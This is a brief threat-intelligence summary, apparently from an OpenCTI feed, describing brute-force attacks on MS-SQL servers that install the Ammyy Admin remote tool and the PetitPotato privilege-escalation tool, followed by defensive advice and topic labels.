Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin

SUMMARY :

A series of attacks targeting poorly managed MS-SQL servers have been identified, involving the installation of Ammyy Admin, a remote control tool. The attackers exploit vulnerable servers, execute commands to gather system information, and use WGet to install additional malware. The installed malware includes Ammyy Admin (mscorsvw.exe), its settings file (settings3.bin), and PetitPotato (p.ax). The attackers utilize an old version of Ammyy Admin (v3.10) and employ known exploitation methods to gain remote control. They also use PetitPotato for privilege escalation, adding new users and activating RDP services. To prevent such attacks, administrators are advised to use strong passwords, update software regularly, and implement security measures like firewalls.

OPENCTI LABELS :

ms-sql,brute force,remote control,petitpotato,privilege escalation,wget,dictionary attack,ammyy admin


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Case of Attacks Targeting MS-SQL Servers to Install Ammyy Admin